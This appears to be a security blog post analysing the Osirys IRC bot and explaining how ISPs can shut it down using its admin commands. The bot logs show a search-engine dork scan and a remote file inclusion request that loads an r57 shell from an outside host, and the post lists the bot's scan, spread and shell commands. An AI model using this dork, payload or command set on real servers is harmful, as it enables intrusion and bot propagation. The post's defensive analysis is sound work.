Andrew Martin

Lets delve a little deeper into the Osirys IRC bot which I initially discussed in part 1. First I will illustrate how the attacker finds and exploits web servers, then I will discuss how ISPs can get involved and remove these bots from their networks.

First the attacker issues a command to the bot to begin scanning. The scan will search for the dork “index.php?sayfa=” which will find hosts that are vulnerable to this attack.

<[attacker]> !rfi index.php?sayfa= “index.php?sayfa=” -p 75

The bot then searches several search engines to find sites that meet the attacker’s criteria and begins trying to exploit them.

<bot> [*] RFI Scan started -> 75 sites/process
<bot> [+] Bug: index.php?sayfa=
<bot> [+] Dork: “index.php?sayfa=”
<bot> [~] >ABACHO : 0 > “index.php?sayfa=”
<bot> [~] >WEB.DE : 0 > “index.php?sayfa=”
<bot> [~] >YAHOO : 0 > “index.php?sayfa=”
<bot> [~] >ASK : 126 > “index.php?sayfa=”
<bot> [~] >ALLTHEWEB : 3084 > “index.php?sayfa=”
<bot> [~] >UOL : 390 > “index.php?sayfa=”
<bot> [~] >MSN : 2997 > “index.php?sayfa=”
<bot> [~] >ALTAVISTA : 630 > “index.php?sayfa=”
<bot> [~] >WEB.DE : 0 > “index.php?sayfa=”
<bot> [~] >GOOGLE : 0 > “index.php?sayfa=”
<bot> [~] >MSN : 3057 > “index.php?sayfa=”
<bot> [~] >ASK : 363 > “index.php?sayfa=”
<bot> [~] >UOL : 225 > “index.php?sayfa=”
<bot> [~] >VIRGILIO : 0 > “index.php?sayfa=”
<bot> [~] >LYCOS : 1731 > “index.php?sayfa=”
<bot> [~] >ABACHO : 0 > “index.php?sayfa=”
<bot> [*] >EXPLOITABLES: 4561 “index.php?sayfa=”
<bot> [+] ExPLoItIng STARTED !!

A vulnerable host is found and the attacker is now able to control the host using their shell, which in this case is in r57.txt.

<bot> (safe: ON) (os: WINNT) http://[removed]/EN/index.php?sayfa=http://www.tos-belarus.org/data/r57.txt???
<bot> (uname -a) Windows NT HERA 5.0 build 2195
<bot> (hdd space) free: ( 4.92 Mb) used: ( 84.00 Kb) tot: ( 5.00 Mb)
<bot> [+] Trying to spread ..
<bot> [%] _/ Exploiting 100 / 4561
ISPs can use the following to interact with the bot and remove it from their network. This bot is running on my own IRC server for testing purposes.

Removal of the bot requires administrative credentials which are available in the script. Looking at the below configuration sample user “andy” may issue administrative commands to the bot.

my @admins = (”andy”);
my $killpwd   = “adminpass”; #Password to Kill the Bot

Show bot commands

<andy> !help
<RFI[13]> [!] !response  > Test if the RFI Response is working
<RFI[13]> [*] !chid <new rfi-id>  > Change the RFI-Response
<RFI[13]> [*] !killme  > KILL The Bot
<RFI[13]> [!] !milw0rm rss  > Get the last Milw0rm bugs
<RFI[13]> [!] !new rfi bugs  > Get the last 10 RFI bugs
<RFI[13]> [!] !new lfi bugs  > Get the last 10 LFI bugs
<RFI[13]> [!] !new sql bugs  > Get the last 10 SQL Injection bugs
<RFI[13]> [!] !new rce bugs  > Get the last 10 RCE bugs
<RFI[13]> [!] !cari <bug> <dork> -p <sites/proc>  > Start the RFI Scanner
<RFI[13]> [!] !lfi <bug> <dork>  > Start the LFI Scanner
<RFI[13]> [!] !sql <bug> <dork> -p <sites/proc>  > Start the SQL Injection Scanner
<RFI[13]> [!] !rce <bug> <dork> -p <sites/proc>  > Start the RCE Scanner
<RFI[13]> [!] !mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc>  > Start the Mass Scan
<RFI[13]> [*] !cmd <bashline>  > Gives command on the Bot’s shell. Ex: (!cmd id) (!cmd uname -a)
<RFI[13]> [*] !sspread -s <RFI_Vuln_site>  > To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)
<RFI[13]> [*] !admin add/remove <nickname>  > To add/remove a nickname to/from the admin list
<RFI[13]> [*] /msg RFI[13] !Sec ON/OFF -p <pwd>  > To enable or disable Security Mode
<RFI[13]> [*] /msg RFI[13] !Spread ON/OFF -p <pwd>  > To enable or disable Spread Mode
<RFI[13]> [!] !info  > Get infos about the Bot

Gather information

<andy> !info
<RFI[13]> [i] Release : v6 -Private IrcBot
<RFI[13]> [i] Author  : Attacker Nickname
<RFI[13]> [i] Contact : attacker@some.com
<RFI[13]> [i] Uname -a: Linux ubuntu 2.6.28-11-server #42-Ubuntu SMP Fri Apr 17 02:45:36 UTC 2009 x86_64 GNU/Linux
<RFI[13]> [i] Uptime  :  15:11:59 up 6 days, 50 min,  2 users,  load average: 0.05, 0.01, 0.00
<RFI[13]> [i] Spread Mode: OFF
<RFI[13]> [i] Security Mode: OFF

Remove the bot (admin only)

<andy> !cmd rm myscan2.txt (optional step if you know the name of the bot file)
<andy> !killme
<RFI[13]> [!] Bye Bye !
* RFI[13] has quit IRC (Client exited)

Remember that simply removing the bot does not address the underlying vulnerability on the system that allowed it to be compromised.

This script also contains valuable investigative information in these two variables:

$auth = “attacker nickname”;
$authmail = “attacker@some.com”;